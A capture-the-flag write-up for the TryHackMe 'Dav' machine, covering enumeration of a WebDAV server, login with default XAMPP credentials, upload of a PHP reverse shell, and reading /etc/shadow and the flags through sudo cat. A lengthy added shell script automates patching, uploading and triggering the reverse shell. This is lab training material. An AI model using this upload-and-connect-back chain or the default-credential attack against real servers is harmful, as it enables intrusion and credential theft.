Dav (THM)

TryHackMe Dav Write-Up

topics: Web application security

  1. Enumeration

  2. Local Privilege Escalation (Exploitation)

  3. Root Privilege Escalation

new tools: cadaver

tools: nmapAutomator, dirsearch, curl, Kali webshells

Enumeration

Initial nmap scan: ./nmapAutomator.sh $ip Basic

The only port that appears to be open is port 80 (http). Let's run a vulnerability scan and dirsearch:

./nmapAutomator.sh $ip Vulns

python3 dirsearch.py -u $ip -e php,html,txt

There appears to be only one directory, /webdav. Attempting to browse to it, or to run dirsearch or gobuster against /webdav, results in a 401 Unauthorized response.

Searching searchsploit for the server version yields only exploits that would not be practical for this CTF challenge.

I attempted this exploit but did not realize at the time that it only works when the server answers the upload with a 201 status code.

This led me to googling "webdav exploit", which proved useful: it revealed the default XAMPP WebDAV credentials wampp:xampp.

Local Privilege Escalation

The passwd.dav file contains a hash that I was unable to crack. After more googling, however, I discovered an interesting command, cadaver (a CLI WebDAV client).

I then learned from this Null Byte article how to get a shell on a WebDAV server.

Exploit steps:

  • We need a PHP reverse shell. Copy the default one from Kali into the /root (working) directory: cp /usr/share/webshells/php/php-reverse-shell.php .

    • Edit the $ip and $port values to the attacker IP and the desired listening port.

  • Upload the reverse shell to the WebDAV server with curl (I initially tried get from the cadaver CLI, but since the file is already on the Kali machine the direction is put; curl's --upload-file issues the same PUT): curl http://10.10.66.11/webdav/shell.php -u wampp:xampp --upload-file php-reverse-shell.php

  • Start a netcat listener on the chosen port.

  • Browse to /webdav/shell.php (with the same credentials) so the server executes it and the shell connects back to the listener.
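The steps above (and the 401 seen during enumeration) scripted end to end, as an added example that is not part of the original write-up: it checks the OPTIONS Allow header for PUT before uploading, patches the Kali webshell's $ip/$port lines with sed, uploads with the same curl PUT, classifies the status code (the write-up notes the upload only counted as working on 201), then requests the file to fire the shell. The LHOST/LPORT defaults and the RUN_EXPLOIT/TARGET/SRC environment variables are assumptions of this script; the sed patterns assume the `$ip = '...';` / `$port = ...;` line layout of Kali's php-reverse-shell.php.

```shell
#!/bin/sh
# Added example (not from the original write-up): script the WebDAV
# upload-and-trigger steps. Assumed: LHOST/LPORT placeholders, the env-var
# names below, and the "$ip = '...';" / "$port = ...;" lines of Kali's
# /usr/share/webshells/php/php-reverse-shell.php.
set -eu

TARGET="${TARGET:-10.10.66.11}"   # target IP from the write-up
DAV_USER="${DAV_USER:-wampp}"     # XAMPP WebDAV default creds from the write-up
DAV_PASS="${DAV_PASS:-xampp}"
LHOST="${LHOST:-10.9.0.1}"        # assumed attacker (VPN) address; override it
LPORT="${LPORT:-4444}"            # assumed listener port; override it
SRC="${SRC:-/usr/share/webshells/php/php-reverse-shell.php}"
DAV_URL="http://$TARGET/webdav/shell.php"

# Return 0 if an OPTIONS "Allow:" header line lists PUT, 1 otherwise.
# Case, spaces and a trailing CR are normalised before splitting on commas.
allow_has_put() {
  printf '%s\n' "$1" | tr 'a-z' 'A-Z' | tr -d ' \r' \
    | sed -n 's/^ALLOW://p' | tr ',' '\n' | grep -qx PUT
}

# Rewrite the shell's hard-coded $ip / $port for our listener (stdin -> stdout).
# Only the assignment is replaced; the "// CHANGE THIS" comment is kept.
patch_shell() {
  sed -e "s/^[\$]ip = '[^']*';/\$ip = '$1';/" \
      -e "s/^[\$]port = [0-9]*;/\$port = $2;/"
}

# Map the status curl reports for the PUT to a one-word verdict.
upload_verdict() {
  case "$1" in
    201) echo created ;;          # new resource: the case the write-up relied on
    204) echo overwritten ;;      # existing shell.php replaced
    401) echo auth-failed ;;      # wrong or missing DAV credentials
    403|405) echo put-not-allowed ;;
    *) echo "unexpected:$1" ;;
  esac
}

# Full run: confirm PUT, patch, upload, then request the shell so it connects
# back. Start 'nc -lvnp $LPORT' in another terminal first.
upload_and_trigger() {
  allow_hdr="$(curl -s -i -X OPTIONS -u "$DAV_USER:$DAV_PASS" \
               "http://$TARGET/webdav/" | grep -i '^Allow:' || true)"
  if [ -n "$allow_hdr" ] && ! allow_has_put "$allow_hdr"; then
    echo "server does not advertise PUT: $allow_hdr" >&2
    return 1
  fi
  patched="$(mktemp)"
  patch_shell "$LHOST" "$LPORT" < "$SRC" > "$patched"
  # -o /dev/null -w '%{http_code}' leaves only the status code on stdout
  code="$(curl -s -o /dev/null -w '%{http_code}' -u "$DAV_USER:$DAV_PASS" \
          --upload-file "$patched" "$DAV_URL")"
  rm -f "$patched"
  echo "PUT shell.php -> $code ($(upload_verdict "$code"))"
  case "$code" in 201|204) ;; *) return 1 ;; esac
  # The GET needs the DAV credentials too (the directory is 401 without them).
  # The PHP shell blocks until the connection drops, so cap the wait.
  curl -s -m 5 -u "$DAV_USER:$DAV_PASS" "$DAV_URL" >/dev/null || true
}

# Touch the network only when asked, so the file can be sourced for its helpers.
if [ "${RUN_EXPLOIT:-0}" = 1 ]; then upload_and_trigger; fi
```

Run it as `RUN_EXPLOIT=1 LHOST=<your VPN IP> sh dav-shell.sh` with the listener already up; a 401 on the PUT means the credentials are wrong, a 403/405 means the DAV location does not accept PUT for this user, and anything other than 201/204 aborts before the trigger request.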

Root Privilege Escalation

First things first on Linux: sudo -l

So our user can run cat via sudo. We can simply read the flags with

sudo cat /home/merlin/user.txt

sudo cat /root/root.txt

Getting a proper terminal as the user or as root is trickier. With sudo cat we can read the password file /etc/shadow and the sudoers file /etc/sudoers, but we can't switch users without a terminal even if we crack a password (the usual way around that is to upgrade the reverse shell to a pseudo-terminal, for example with Python's pty module, after which su behaves normally). There is no other service to log in to as the user merlin, or to send a shell back to us, as far as I can see at the moment. Maybe there is a kernel exploit we can use; I can always transfer LinPEAS to enumerate. This will be a good post-exploitation exercise to return to.

This machine has the same kernel as Fowsniff, where a kernel exploit was used to spawn a root shell, so we can attempt the same exploit here.
